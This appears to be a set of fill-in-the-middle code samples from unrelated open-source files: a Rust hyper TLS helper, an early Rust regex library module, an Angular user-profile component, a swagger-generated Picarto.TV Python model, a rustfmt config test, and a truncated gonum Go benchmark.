<|file_name|>http.rs<|end_file_name|><|fim▁begin|>use hyper::Client; use hyper::net::HttpsConnector; use hyper_native_tls::NativeTlsClient; error_chain!{ errors {<|fim▁hole|> } } pub fn tls_client() -> Result<Client> { let ssl = NativeTlsClient::new().chain_err(|| ErrorKind::FailedToCreateTlsClient)?; let connector = HttpsConnector::new(ssl); let client = Client::with_connector(connector); Ok(client) }<|fim▁end|>
FailedToCreateTlsClient { description("Failed to create TLS client") display("Failed to create TLS client") }
<|file_name|>re.rs<|end_file_name|><|fim▁begin|>// Copyright 2014 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. use collections::HashMap; use std::fmt; use std::from_str::from_str; use std::str::{MaybeOwned, Owned, Slice}; use compile::Program; use parse; use vm; use vm::{CaptureLocs, MatchKind, Exists, Location, Submatches}; /// Escapes all regular expression meta characters in `text` so that it may be /// safely used in a regular expression as a literal string. pub fn quote(text: &str) -> StrBuf { let mut quoted = StrBuf::with_capacity(text.len()); for c in text.chars() { if parse::is_punct(c) { quoted.push_char('\\') } quoted.push_char(c); } quoted } /// Tests if the given regular expression matches somewhere in the text given. /// /// If there was a problem compiling the regular expression, an error is /// returned. /// /// To find submatches, split or replace text, you'll need to compile an /// expression first. /// /// Note that you should prefer the `regex!` macro when possible. For example, /// `regex!("...").is_match("...")`. pub fn is_match(regex: &str, text: &str) -> Result<bool, parse::Error> { Regex::new(regex).map(|r| r.is_match(text)) } /// Regex is a compiled regular expression, represented as either a sequence /// of bytecode instructions (dynamic) or as a specialized Rust function /// (native). It can be used to search, split /// or replace text. All searching is done with an implicit `.*?` at the /// beginning and end of an expression. To force an expression to match the /// whole string (or a prefix or a suffix), you must use an anchor like `^` or /// `$` (or `\A` and `\z`). /// /// While this crate will handle Unicode strings (whether in the regular /// expression or in the search text), all positions returned are **byte /// indices**. Every byte index is guaranteed to be at a UTF8 codepoint /// boundary. /// /// The lifetimes `'r` and `'t` in this crate correspond to the lifetime of a /// compiled regular expression and text to search, respectively. /// /// The only methods that allocate new strings are the string replacement /// methods. All other methods (searching and splitting) return borrowed /// pointers into the string given. /// /// # Examples /// /// Find the location of a US phone number: /// /// ```rust /// # use regex::Regex; /// let re = match Regex::new("[0-9]{3}-[0-9]{3}-[0-9]{4}") { /// Ok(re) => re, /// Err(err) => fail!("{}", err), /// }; /// assert_eq!(re.find("phone: 111-222-3333"), Some((7, 19))); /// ``` /// /// You can also use the `regex!` macro to compile a regular expression when /// you compile your program: /// /// ```rust /// #![feature(phase)] /// extern crate regex; /// #[phase(syntax)] extern crate regex_macros; /// /// fn main() { /// let re = regex!(r"\d+"); /// assert_eq!(re.find("123 abc"), Some((0, 3))); /// } /// ``` /// /// Given an incorrect regular expression, `regex!` will cause the Rust /// compiler to produce a compile time error. /// Note that `regex!` will compile the expression to native Rust code, which /// makes it much faster when searching text. 
/// More details about the `regex!` macro can be found in the `regex` crate /// documentation. #[deriving(Clone)] #[allow(visible_private_types)] pub struct Regex { /// The representation of `Regex` is exported to support the `regex!` /// syntax extension. Do not rely on it. /// /// See the comments for the `program` module in `lib.rs` for a more /// detailed explanation for what `regex!` requires. #[doc(hidden)] pub original: StrBuf, #[doc(hidden)] pub names: Vec<Option<StrBuf>>, #[doc(hidden)] pub p: MaybeNative, } impl fmt::Show for Regex { /// Shows the original regular expression. fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "{}", self.original) } } pub enum MaybeNative { Dynamic(Program), Native(fn(MatchKind, &str, uint, uint) -> Vec<Option<uint>>), } impl Clone for MaybeNative { fn clone(&self) -> MaybeNative { match *self { Dynamic(ref p) => Dynamic(p.clone()), Native(fp) => Native(fp), } } } impl Regex { /// Compiles a dynamic regular expression. Once compiled, it can be /// used repeatedly to search, split or replace text in a string. /// /// When possible, you should prefer the `regex!` macro since it is /// safer and always faster. /// /// If an invalid expression is given, then an error is returned. pub fn new(re: &str) -> Result<Regex, parse::Error> { let ast = try!(parse::parse(re)); let (prog, names) = Program::new(ast); Ok(Regex { original: re.to_strbuf(), names: names, p: Dynamic(prog), }) } /// Returns true if and only if the regex matches the string given. /// /// # Example /// /// Test if some text contains at least one word with exactly 13 /// characters: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let text = "I categorically deny having triskaidekaphobia."; /// let matched = regex!(r"\b\w{13}\b").is_match(text); /// assert!(matched); /// # } /// ``` pub fn is_match(&self, text: &str) -> bool { has_match(&exec(self, Exists, text)) } /// Returns the start and end byte range of the leftmost-first match in /// `text`. If no match exists, then `None` is returned. /// /// Note that this should only be used if you want to discover the position /// of the match. Testing the existence of a match is faster if you use /// `is_match`. /// /// # Example /// /// Find the start and end location of every word with exactly 13 /// characters: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let text = "I categorically deny having triskaidekaphobia."; /// let pos = regex!(r"\b\w{13}\b").find(text); /// assert_eq!(pos, Some((2, 15))); /// # } /// ``` pub fn find(&self, text: &str) -> Option<(uint, uint)> { let caps = exec(self, Location, text); if has_match(&caps) { Some((caps.get(0).unwrap(), caps.get(1).unwrap())) } else { None } } /// Returns an iterator for each successive non-overlapping match in /// `text`, returning the start and end byte indices with respect to /// `text`. 
/// /// # Example /// /// Find the start and end location of the first word with exactly 13 /// characters: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let text = "Retroactively relinquishing remunerations is reprehensible."; /// for pos in regex!(r"\b\w{13}\b").find_iter(text) { /// println!("{}", pos); /// } /// // Output: /// // (0, 13) /// // (14, 27) /// // (28, 41) /// // (45, 58) /// # } /// ``` pub fn find_iter<'r, 't>(&'r self, text: &'t str) -> FindMatches<'r, 't> { FindMatches { re: self, search: text, last_end: 0, last_match: None, } } /// Returns the capture groups corresponding to the leftmost-first /// match in `text`. Capture group `0` always corresponds to the entire /// match. If no match is found, then `None` is returned. /// /// You should only use `captures` if you need access to submatches. /// Otherwise, `find` is faster for discovering the location of the overall /// match. /// /// # Examples /// /// Say you have some text with movie names and their release years, /// like "'Citizen Kane' (1941)". It'd be nice if we could search for text /// looking like that, while also extracting the movie name and its release /// year separately. /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"'([^']+)'\s+\((\d{4})\)"); /// let text = "Not my favorite movie: 'Citizen Kane' (1941)."; /// let caps = re.captures(text).unwrap(); /// assert_eq!(caps.at(1), "Citizen Kane"); /// assert_eq!(caps.at(2), "1941"); /// assert_eq!(caps.at(0), "'Citizen Kane' (1941)"); /// # } /// ``` /// /// Note that the full match is at capture group `0`. Each subsequent /// capture group is indexed by the order of its opening `(`. /// /// We can make this example a bit clearer by using *named* capture groups: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"'(?P<title>[^']+)'\s+\((?P<year>\d{4})\)"); /// let text = "Not my favorite movie: 'Citizen Kane' (1941)."; /// let caps = re.captures(text).unwrap(); /// assert_eq!(caps.name("title"), "Citizen Kane"); /// assert_eq!(caps.name("year"), "1941"); /// assert_eq!(caps.at(0), "'Citizen Kane' (1941)"); /// # } /// ``` /// /// Here we name the capture groups, which we can access with the `name` /// method. Note that the named capture groups are still accessible with /// `at`. /// /// The `0`th capture group is always unnamed, so it must always be /// accessed with `at(0)`. pub fn captures<'t>(&self, text: &'t str) -> Option<Captures<'t>> { let caps = exec(self, Submatches, text); Captures::new(self, text, caps) } /// Returns an iterator over all the non-overlapping capture groups matched /// in `text`. This is operationally the same as `find_iter` (except it /// yields information about submatches). 
/// /// # Example /// /// We can use this to find all movie titles and their release years in /// some text, where the movie is formatted like "'Title' (xxxx)": /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"'(?P<title>[^']+)'\s+\((?P<year>\d{4})\)"); /// let text = "'Citizen Kane' (1941), 'The Wizard of Oz' (1939), 'M' (1931)."; /// for caps in re.captures_iter(text) { /// println!("Movie: {}, Released: {}", caps.name("title"), caps.name("year")); /// } /// // Output: /// // Movie: Citizen Kane, Released: 1941 /// // Movie: The Wizard of Oz, Released: 1939 /// // Movie: M, Released: 1931 /// # } /// ``` pub fn captures_iter<'r, 't>(&'r self, text: &'t str) -> FindCaptures<'r, 't> { FindCaptures { re: self, search: text, last_match: None, last_end: 0, } } /// Returns an iterator of substrings of `text` delimited by a match /// of the regular expression. /// Namely, each element of the iterator corresponds to text that *isn't* /// matched by the regular expression. /// /// This method will *not* copy the text given. /// /// # Example /// /// To split a string delimited by arbitrary amounts of spaces or tabs: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"[ \t]+"); /// let fields: Vec<&str> = re.split("a b \t c\td e").collect(); /// assert_eq!(fields, vec!("a", "b", "c", "d", "e")); /// # } /// ``` pub fn split<'r, 't>(&'r self, text: &'t str) -> RegexSplits<'r, 't> { RegexSplits { finder: self.find_iter(text), last: 0, } } /// Returns an iterator of at most `limit` substrings of `text` delimited /// by a match of the regular expression. (A `limit` of `0` will return no /// substrings.) /// Namely, each element of the iterator corresponds to text that *isn't* /// matched by the regular expression. /// The remainder of the string that is not split will be the last element /// in the iterator. /// /// This method will *not* copy the text given. /// /// # Example /// /// Get the first two words in some text: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"\W+"); /// let fields: Vec<&str> = re.splitn("Hey! How are you?", 3).collect(); /// assert_eq!(fields, vec!("Hey", "How", "are you?")); /// # } /// ``` pub fn splitn<'r, 't>(&'r self, text: &'t str, limit: uint) -> RegexSplitsN<'r, 't> { RegexSplitsN { splits: self.split(text), cur: 0, limit: limit, } } /// Replaces the leftmost-first match with the replacement provided. /// The replacement can be a regular string (where `$N` and `$name` are /// expanded to match capture groups) or a function that takes the matches' /// `Captures` and returns the replaced string. /// /// If no match is found, then a copy of the string is returned unchanged. /// /// # Examples /// /// Note that this function is polymorphic with respect to the replacement. /// In typical usage, this can just be a normal string: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!("[^01]+"); /// assert_eq!(re.replace("1078910", "").as_slice(), "1010"); /// # } /// ``` /// /// But anything satisfying the `Replacer` trait will work. For example, /// a closure of type `|&Captures| -> StrBuf` provides direct access to the /// captures corresponding to a match. 
This allows one to access /// submatches easily: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # use regex::Captures; fn main() { /// let re = regex!(r"([^,\s]+),\s+(\S+)"); /// let result = re.replace("Springsteen, Bruce", |caps: &Captures| { /// format_strbuf!("{} {}", caps.at(2), caps.at(1)) /// }); /// assert_eq!(result.as_slice(), "Bruce Springsteen"); /// # } /// ``` /// /// But this is a bit cumbersome to use all the time. Instead, a simple /// syntax is supported that expands `$name` into the corresponding capture /// group. Here's the last example, but using this expansion technique /// with named capture groups: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// let re = regex!(r"(?P<last>[^,\s]+),\s+(?P<first>\S+)"); /// let result = re.replace("Springsteen, Bruce", "$first $last"); /// assert_eq!(result.as_slice(), "Bruce Springsteen"); /// # } /// ``` /// /// Note that using `$2` instead of `$first` or `$1` instead of `$last` /// would produce the same result. To write a literal `$` use `$$`. /// /// Finally, sometimes you just want to replace a literal string with no /// submatch expansion. This can be done by wrapping a string with /// `NoExpand`: /// /// ```rust /// # #![feature(phase)] /// # extern crate regex; #[phase(syntax)] extern crate regex_macros; /// # fn main() { /// use regex::NoExpand; /// /// let re = regex!(r"(?P<last>[^,\s]+),\s+(\S+)"); /// let result = re.replace("Springsteen, Bruce", NoExpand("$2 $last")); /// assert_eq!(result.as_slice(), "$2 $last"); /// # } /// ``` pub fn replace<R: Replacer>(&self, text: &str, rep: R) -> StrBuf { self.replacen(text, 1, rep) } /// Replaces all non-overlapping matches in `text` with the /// replacement provided. This is the same as calling `replacen` with /// `limit` set to `0`. /// /// See the documentation for `replace` for details on how to access /// submatches in the replacement string. pub fn replace_all<R: Replacer>(&self, text: &str, rep: R) -> StrBuf { self.replacen(text, 0, rep) } /// Replaces at most `limit` non-overlapping matches in `text` with the /// replacement provided. If `limit` is 0, then all non-overlapping matches /// are replaced. /// /// See the documentation for `replace` for details on how to access /// submatches in the replacement string. pub fn replacen<R: Replacer> (&self, text: &str, limit: uint, mut rep: R) -> StrBuf { let mut new = StrBuf::with_capacity(text.len()); let mut last_match = 0u; for (i, cap) in self.captures_iter(text).enumerate() { // It'd be nicer to use the 'take' iterator instead, but it seemed // awkward given that '0' => no limit. if limit > 0 && i >= limit { break } let (s, e) = cap.pos(0).unwrap(); // captures only reports matches new.push_str(text.slice(last_match, s)); new.push_str(rep.reg_replace(&cap).as_slice()); last_match = e; } new.append(text.slice(last_match, text.len())) } } /// NoExpand indicates literal string replacement. /// /// It can be used with `replace` and `replace_all` to do a literal /// string replacement without expanding `$name` to their corresponding /// capture groups. /// /// `'r` is the lifetime of the literal text. pub struct NoExpand<'t>(pub &'t str); /// Replacer describes types that can be used to replace matches in a string. pub trait Replacer { /// Returns a possibly owned string that is used to replace the match /// corresponding the the `caps` capture group. 
/// /// The `'a` lifetime refers to the lifetime of a borrowed string when /// a new owned string isn't needed (e.g., for `NoExpand`). fn reg_replace<'a>(&'a mut self, caps: &Captures) -> MaybeOwned<'a>; } impl<'t> Replacer for NoExpand<'t> { fn reg_replace<'a>(&'a mut self, _: &Captures) -> MaybeOwned<'a> { let NoExpand(s) = *self; Slice(s) } } impl<'t> Replacer for &'t str { fn reg_replace<'a>(&'a mut self, caps: &Captures) -> MaybeOwned<'a> { Owned(caps.expand(*self).into_owned()) } } impl<'a> Replacer for |&Captures|: 'a -> StrBuf { fn reg_replace<'r>(&'r mut self, caps: &Captures) -> MaybeOwned<'r> { Owned((*self)(caps).into_owned()) } } /// Yields all substrings delimited by a regular expression match. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the string being split. pub struct RegexSplits<'r, 't> { finder: FindMatches<'r, 't>, last: uint, }<|fim▁hole|> impl<'r, 't> Iterator<&'t str> for RegexSplits<'r, 't> { fn next(&mut self) -> Option<&'t str> { let text = self.finder.search; match self.finder.next() { None => { if self.last >= text.len() { None } else { let s = text.slice(self.last, text.len()); self.last = text.len(); Some(s) } } Some((s, e)) => { let matched = text.slice(self.last, s); self.last = e; Some(matched) } } } } /// Yields at most `N` substrings delimited by a regular expression match. /// /// The last substring will be whatever remains after splitting. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the string being split. pub struct RegexSplitsN<'r, 't> { splits: RegexSplits<'r, 't>, cur: uint, limit: uint, } impl<'r, 't> Iterator<&'t str> for RegexSplitsN<'r, 't> { fn next(&mut self) -> Option<&'t str> { let text = self.splits.finder.search; if self.cur >= self.limit { None } else { self.cur += 1; if self.cur >= self.limit { Some(text.slice(self.splits.last, text.len())) } else { self.splits.next() } } } } /// Captures represents a group of captured strings for a single match. /// /// The 0th capture always corresponds to the entire match. Each subsequent /// index corresponds to the next capture group in the regex. /// If a capture group is named, then the matched string is *also* available /// via the `name` method. (Note that the 0th capture is always unnamed and so /// must be accessed with the `at` method.) /// /// Positions returned from a capture group are always byte indices. /// /// `'t` is the lifetime of the matched text. pub struct Captures<'t> { text: &'t str, locs: CaptureLocs, named: Option<HashMap<StrBuf, uint>>, } impl<'t> Captures<'t> { fn new(re: &Regex, search: &'t str, locs: CaptureLocs) -> Option<Captures<'t>> { if !has_match(&locs) { return None } let named = if re.names.len() == 0 { None } else { let mut named = HashMap::new(); for (i, name) in re.names.iter().enumerate() { match name { &None => {}, &Some(ref name) => { named.insert(name.to_strbuf(), i); } } } Some(named) }; Some(Captures { text: search, locs: locs, named: named, }) } /// Returns the start and end positions of the Nth capture group. /// Returns `None` if `i` is not a valid capture group or if the capture /// group did not match anything. /// The positions returned are *always* byte indices with respect to the /// original string matched. pub fn pos(&self, i: uint) -> Option<(uint, uint)> { let (s, e) = (i * 2, i * 2 + 1); if e >= self.locs.len() || self.locs.get(s).is_none() { // VM guarantees that each pair of locations are both Some or None. 
return None } Some((self.locs.get(s).unwrap(), self.locs.get(e).unwrap())) } /// Returns the matched string for the capture group `i`. /// If `i` isn't a valid capture group or didn't match anything, then the /// empty string is returned. pub fn at(&self, i: uint) -> &'t str { match self.pos(i) { None => "", Some((s, e)) => { self.text.slice(s, e) } } } /// Returns the matched string for the capture group named `name`. /// If `name` isn't a valid capture group or didn't match anything, then /// the empty string is returned. pub fn name(&self, name: &str) -> &'t str { match self.named { None => "", Some(ref h) => { match h.find_equiv(&name) { None => "", Some(i) => self.at(*i), } } } } /// Creates an iterator of all the capture groups in order of appearance /// in the regular expression. pub fn iter(&'t self) -> SubCaptures<'t> { SubCaptures { idx: 0, caps: self, } } /// Creates an iterator of all the capture group positions in order of /// appearance in the regular expression. Positions are byte indices /// in terms of the original string matched. pub fn iter_pos(&'t self) -> SubCapturesPos<'t> { SubCapturesPos { idx: 0, caps: self, } } /// Expands all instances of `$name` in `text` to the corresponding capture /// group `name`. /// /// `name` may be an integer corresponding to the index of the /// capture group (counted by order of opening parenthesis where `0` is the /// entire match) or it can be a name (consisting of letters, digits or /// underscores) corresponding to a named capture group. /// /// If `name` isn't a valid capture group (whether the name doesn't exist or /// isn't a valid index), then it is replaced with the empty string. /// /// To write a literal `$` use `$$`. pub fn expand(&self, text: &str) -> StrBuf { // How evil can you get? // FIXME: Don't use regexes for this. It's completely unnecessary. let re = Regex::new(r"(^|[^$]|\b)\$(\w+)").unwrap(); let text = re.replace_all(text, |refs: &Captures| -> StrBuf { let (pre, name) = (refs.at(1), refs.at(2)); format_strbuf!("{}{}", pre, match from_str::<uint>(name.as_slice()) { None => self.name(name).to_strbuf(), Some(i) => self.at(i).to_strbuf(), }) }); let re = Regex::new(r"\$\$").unwrap(); re.replace_all(text.as_slice(), NoExpand("$")) } } impl<'t> Container for Captures<'t> { /// Returns the number of captured groups. #[inline] fn len(&self) -> uint { self.locs.len() / 2 } } /// An iterator over capture groups for a particular match of a regular /// expression. /// /// `'t` is the lifetime of the matched text. pub struct SubCaptures<'t> { idx: uint, caps: &'t Captures<'t>, } impl<'t> Iterator<&'t str> for SubCaptures<'t> { fn next(&mut self) -> Option<&'t str> { if self.idx < self.caps.len() { self.idx += 1; Some(self.caps.at(self.idx - 1)) } else { None } } } /// An iterator over capture group positions for a particular match of a /// regular expression. /// /// Positions are byte indices in terms of the original string matched. /// /// `'t` is the lifetime of the matched text. pub struct SubCapturesPos<'t> { idx: uint, caps: &'t Captures<'t>, } impl<'t> Iterator<Option<(uint, uint)>> for SubCapturesPos<'t> { fn next(&mut self) -> Option<Option<(uint, uint)>> { if self.idx < self.caps.len() { self.idx += 1; Some(self.caps.pos(self.idx - 1)) } else { None } } } /// An iterator that yields all non-overlapping capture groups matching a /// particular regular expression. The iterator stops when no more matches can /// be found. 
/// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the matched string. pub struct FindCaptures<'r, 't> { re: &'r Regex, search: &'t str, last_match: Option<uint>, last_end: uint, } impl<'r, 't> Iterator<Captures<'t>> for FindCaptures<'r, 't> { fn next(&mut self) -> Option<Captures<'t>> { if self.last_end > self.search.len() { return None } let caps = exec_slice(self.re, Submatches, self.search, self.last_end, self.search.len()); let (s, e) = if !has_match(&caps) { return None } else { (caps.get(0).unwrap(), caps.get(1).unwrap()) }; // Don't accept empty matches immediately following a match. // i.e., no infinite loops please. if e == s && Some(self.last_end) == self.last_match { self.last_end += 1; return self.next() } self.last_end = e; self.last_match = Some(self.last_end); Captures::new(self.re, self.search, caps) } } /// An iterator over all non-overlapping matches for a particular string. /// /// The iterator yields a tuple of integers corresponding to the start and end /// of the match. The indices are byte offsets. The iterator stops when no more /// matches can be found. /// /// `'r` is the lifetime of the compiled expression and `'t` is the lifetime /// of the matched string. pub struct FindMatches<'r, 't> { re: &'r Regex, search: &'t str, last_match: Option<uint>, last_end: uint, } impl<'r, 't> Iterator<(uint, uint)> for FindMatches<'r, 't> { fn next(&mut self) -> Option<(uint, uint)> { if self.last_end > self.search.len() { return None } let caps = exec_slice(self.re, Location, self.search, self.last_end, self.search.len()); let (s, e) = if !has_match(&caps) { return None } else { (caps.get(0).unwrap(), caps.get(1).unwrap()) }; // Don't accept empty matches immediately following a match. // i.e., no infinite loops please. if e == s && Some(self.last_end) == self.last_match { self.last_end += 1; return self.next() } self.last_end = e; self.last_match = Some(self.last_end); Some((s, e)) } } fn exec(re: &Regex, which: MatchKind, input: &str) -> CaptureLocs { exec_slice(re, which, input, 0, input.len()) } fn exec_slice(re: &Regex, which: MatchKind, input: &str, s: uint, e: uint) -> CaptureLocs { match re.p { Dynamic(ref prog) => vm::run(which, prog, input, s, e), Native(exec) => exec(which, input, s, e), } } #[inline] fn has_match(caps: &CaptureLocs) -> bool { caps.len() >= 2 && caps.get(0).is_some() && caps.get(1).is_some() }<|fim▁end|>
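// A minimal usage sketch, not part of the regex file above: it exercises the
// dynamic `Regex::new` API exactly as documented in the doc comments of that
// file (inputs and expected outputs are taken from those examples; the
// function name `example_usage` is illustrative only, and error handling is
// elided).
fn example_usage() {
    let re = Regex::new(r"'(?P<title>[^']+)'\s+\((?P<year>\d{4})\)").unwrap();
    let caps = re.captures("Not my favorite movie: 'Citizen Kane' (1941).").unwrap();
    assert_eq!(caps.name("title"), "Citizen Kane");
    assert_eq!(caps.name("year"), "1941");

    // `$name` in the replacement expands to the corresponding named capture
    // group, as described for `replace` above.
    let re = Regex::new(r"(?P<last>[^,\s]+),\s+(?P<first>\S+)").unwrap();
    let swapped = re.replace("Springsteen, Bruce", "$first $last");
    assert_eq!(swapped.as_slice(), "Bruce Springsteen");
}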
<|file_name|>user-profile.component.ts<|end_file_name|><|fim▁begin|>import {Component, EventEmitter, Output, Input, OnInit} from '@angular/core'; import {UserModel, UserResponse} from "../user-management/user.model"; import {UserService} from "../user-management/user.service"; import {Config} from "../../../shared/configs/general.config"; @Component({ selector: 'user-profile', templateUrl: './user-profile.html' }) export class UserProfileComponent implements OnInit { // @Input showInfo:boolean; @Input() userId:string; @Output() userEditEvent:EventEmitter<any> = new EventEmitter(); @Input() showView:boolean; objUser:UserModel = new UserModel(); objResponse:UserResponse = new UserResponse(); imageSrc:string=Config.DefaultAvatar; ngOnInit() { this.getUserDetail(); } constructor(private _objUserService:UserService) { } getUserDetail() { this._objUserService.getUserDetail(this.userId) .subscribe(resUser => this.bindDetail(resUser), error => this.errorMessage(error)); } errorMessage(objResponse:any) { swal("Alert !", objResponse.message, "info"); } bindDetail(objUser:UserModel) { this.objUser = objUser; if (!this.objUser.imageName) this.imageSrc = Config.DefaultAvatar; else { let cl = Config.Cloudinary; this.imageSrc = cl.url(this.objUser.imageName, {transformation: [{width: 100, crop: "scale"}]}); } } onShowView(args) { if (!args) // isCanceled this.getUserDetail(); this.showView = true; }<|fim▁hole|> } }<|fim▁end|>
onShowEdit() { this.showView = false;
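// A hypothetical parent component, sketched only to show how the inputs
// (`userId`, `showView`) and output (`userEditEvent`) declared by
// UserProfileComponent above would be bound from a template; the host
// component name and its fields are assumptions, not part of the original
// file.
import {Component} from '@angular/core';

@Component({
  selector: 'user-profile-host',
  template: `<user-profile [userId]="selectedUserId" [showView]="true"
                           (userEditEvent)="onUserEdit($event)"></user-profile>`
})
export class UserProfileHostComponent {
  selectedUserId: string = '';

  onUserEdit(event: any) {
    console.log('edit requested', event);
  }
}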
<|file_name|>video_search_result.py<|end_file_name|><|fim▁begin|># coding: utf-8 """ Picarto.TV API Documentation The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details OpenAPI spec version: 1.2.5 Contact: [email protected] Generated by: https://github.com/swagger-api/swagger-codegen.git """ from pprint import pformat from six import iteritems import re class VideoSearchResult(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'channel': 'BasicChannelInfo', 'video': 'ChannelVideo' } attribute_map = { 'channel': 'channel', 'video': 'video' } def __init__(self, channel=None, video=None): """ VideoSearchResult - a model defined in Swagger """ self._channel = None self._video = None if channel is not None: self.channel = channel if video is not None:<|fim▁hole|> self.video = video @property def channel(self): """ Gets the channel of this VideoSearchResult. :return: The channel of this VideoSearchResult. :rtype: BasicChannelInfo """ return self._channel @channel.setter def channel(self, channel): """ Sets the channel of this VideoSearchResult. :param channel: The channel of this VideoSearchResult. :type: BasicChannelInfo """ self._channel = channel @property def video(self): """ Gets the video of this VideoSearchResult. :return: The video of this VideoSearchResult. :rtype: ChannelVideo """ return self._video @video.setter def video(self, video): """ Sets the video of this VideoSearchResult. :param video: The video of this VideoSearchResult. :type: ChannelVideo """ self._video = video def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ if not isinstance(other, VideoSearchResult): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other<|fim▁end|>
<|file_name|>configs-where_pred_indent-block.rs<|end_file_name|><|fim▁begin|>// rustfmt-where_pred_indent: Block // Where predicate indent <|fim▁hole|> Sit: Eq, Amet: Eq, { // body }<|fim▁end|>
fn lorem<Ipsum, Dolor, Sit, Amet>() -> T where Ipsum: Eq, Dolor: Eq,
<|file_name|>bench_test.go<|end_file_name|><|fim▁begin|>// Copyright ©2016 The Gonum Authors. All rights reserved. // Use of this source code is governed by a BSD-style // license that can be found in the LICENSE file. package f32 import "testing" const ( benchLen = 1e5 a = 2 ) var ( x = make([]float32, benchLen) y = make([]float32, benchLen) z = make([]float32, benchLen) ) func init() { for n := range x { x[n] = float32(n) y[n] = float32(n) } } func benchaxpyu(t *testing.B, n int, f func(a float32, x, y []float32)) { x, y := x[:n], y[:n] for i := 0; i < t.N; i++ { f(a, x, y) } } func naiveaxpyu(a float32, x, y []float32) { for i, v := range x { y[i] += a * v } } func BenchmarkF32AxpyUnitary1(t *testing.B) { benchaxpyu(t, 1, AxpyUnitary) } func BenchmarkF32AxpyUnitary2(t *testing.B) { benchaxpyu(t, 2, AxpyUnitary) } func BenchmarkF32AxpyUnitary3(t *testing.B) { benchaxpyu(t, 3, AxpyUnitary) } func BenchmarkF32AxpyUnitary4(t *testing.B) { benchaxpyu(t, 4, AxpyUnitary) } func BenchmarkF32AxpyUnitary5(t *testing.B) { benchaxpyu(t, 5, AxpyUnitary) } func BenchmarkF32AxpyUnitary10(t *testing.B) { benchaxpyu(t, 10, AxpyUnitary) } func BenchmarkF32AxpyUnitary100(t *testing.B) { benchaxpyu(t, 100, AxpyUnitary) } func BenchmarkF32AxpyUnitary1000(t *testing.B) { benchaxpyu(t, 1000, AxpyUnitary) } func BenchmarkF32AxpyUnitary5000(t *testing.B) { benchaxpyu(t, 5000, AxpyUnitary) } func BenchmarkF32AxpyUnitary10000(t *testing.B) { benchaxpyu(t, 10000, AxpyUnitary) } func BenchmarkF32AxpyUnitary50000(t *testing.B) { benchaxpyu(t, 50000, AxpyUnitary) } func BenchmarkLF32AxpyUnitary1(t *testing.B) { benchaxpyu(t, 1, naiveaxpyu) } func BenchmarkLF32AxpyUnitary2(t *testing.B) { benchaxpyu(t, 2, naiveaxpyu) } func BenchmarkLF32AxpyUnitary3(t *testing.B) { benchaxpyu(t, 3, naiveaxpyu) } func BenchmarkLF32AxpyUnitary4(t *testing.B) { benchaxpyu(t, 4, naiveaxpyu) } func BenchmarkLF32AxpyUnitary5(t *testing.B) { benchaxpyu(t, 5, naiveaxpyu) } func BenchmarkLF32AxpyUnitary10(t *testing.B) { benchaxpyu(t, 10, naiveaxpyu) } func BenchmarkLF32AxpyUnitary100(t *testing.B) { benchaxpyu(t, 100, naiveaxpyu) } func BenchmarkLF32AxpyUnitary1000(t *testing.B) { benchaxpyu(t, 1000, naiveaxpyu) } func BenchmarkLF32AxpyUnitary5000(t *testing.B) { benchaxpyu(t, 5000, naiveaxpyu) } func BenchmarkLF32AxpyUnitary10000(t *testing.B) { benchaxpyu(t, 10000, naiveaxpyu) } func BenchmarkLF32AxpyUnitary50000(t *testing.B) { benchaxpyu(t, 50000, naiveaxpyu) } func benchaxpyut(t *testing.B, n int, f func(d []float32, a float32, x, y []float32)) { x, y, z := x[:n], y[:n], z[:n] for i := 0; i < t.N; i++ { f(z, a, x, y) } } func 